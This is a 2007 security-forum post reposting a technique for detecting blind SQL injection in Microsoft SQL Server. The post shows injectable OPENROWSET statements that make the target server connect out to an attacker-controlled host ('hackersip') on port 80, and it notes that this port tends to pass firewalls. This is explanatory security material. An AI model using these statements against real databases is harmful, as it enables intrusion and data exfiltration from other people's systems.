Waraxe IT Security Portal
Login or Register
November 18, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 93
Members: 0
Total: 93
Full disclosure
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> Detection Of Sql Injection Vulnerabilities
Post new topicReply to topic View previous topic :: View next topic
Detection Of Sql Injection Vulnerabilities
PostPosted: Sun Feb 11, 2007 4:39 pm Reply with quote
Dinosaurio
Regular user
Regular user
Joined: Aug 11, 2006
Posts: 10




Hi,


Many developers and web administrators are complacent about SQL Injection vulnerabilities if the attacker cannot see the SQL error messages and/or cannot return the queries result directly to the browser.This topic was first addressed in a white paper written by Chris Ansley of NGSSoftware

(http://www.nextgenss.com/papers/more...injection.pdf). This paper will
expand on possible ways this threat can be used. When trying to exploit SQL Injection in an application, an attacker needs a method of determining if the SQL injected is executed on the server. As well, a method of retrieving the results is needed. Two built-in functions of SQL Server can be used for this purpose. The OPENROWSET and OPENDATASOURCE
functions allow a user in SQL Server to open remote data sources. These functions are used to open a connection to an OLEDB provider. The OPENROWSET function will be use in all the examples but the OPENDATASOURCE function could be used with the same results.
This statement will return all the rows of table1 on the remote data source:

select * from
OPENROWSET( 'SQLoledb',
'server=servername;uid=sa;pwd=h8ck3r',
'select * from table1' )

Parameters:
(1) OLEDB Provider name
(2) Connection string (could be an OLEDB data source or an ODBC connection string)
(3) SQL statement

The connection string parameter can specify other options such as the network library to use or the IP address and port to which to connect. Below is an example.

select * from
OPENROWSET('SQLoledb',
'uid=sa;pwd=h8ck3r;Network=DBMSSOCN;Address=10.0.0 .10,1433;',
'select * from table' )

In this example, SQL Server will use the OLEDB provider SQLoledb to execute the SQL statement. The OLEDB provider will use the SQL Server sockets library (DBMSSOCN) to connect to port 1433 on the IP address 10.0.0.10 and will return the results of the SQL statement to the local SQL Server. The login sa and the password h8ck3r will be used to authenticate to the remote data source.

The next example demonstrates how the OPENROWSET function can be used to connect to an arbitrary IP address/port including the source IP address and port of the attacker. In this case the hacker?s host name is hackersip and a version of Microsoft SQL Server is running on port 80. ?hackersip? can be replaced with an IP address and the port can be any port the hacker would like to direct connections to.

select * from
OPENROWSET('SQLoledb',
'uid=sa;pwd=;Network=DBMSSOCN;Address=hackersip,80 ;',
'select * from table')

WWW.APPSECINC.COM
By injecting this SQL statement, an attacker can determine if the statement is being executed. If the SQL is successfully executed, the attacked server will issue an outbound connection attempt to the attacker?s computer on the port specified. It is also unlikely that the firewall will block this outbound SQL connection because the connection is occurring over port 80.

This technique allows the attacker to determine if injected SQL statements executed even if error messages and query results are not returned to the browser.


Enjoy reading


Good Luck

Dino


PD:
Font :Cesar Cerrudo (sqlsec@yahoo.com)
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
Detection Of Sql Injection Vulnerabilities
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.049 Seconds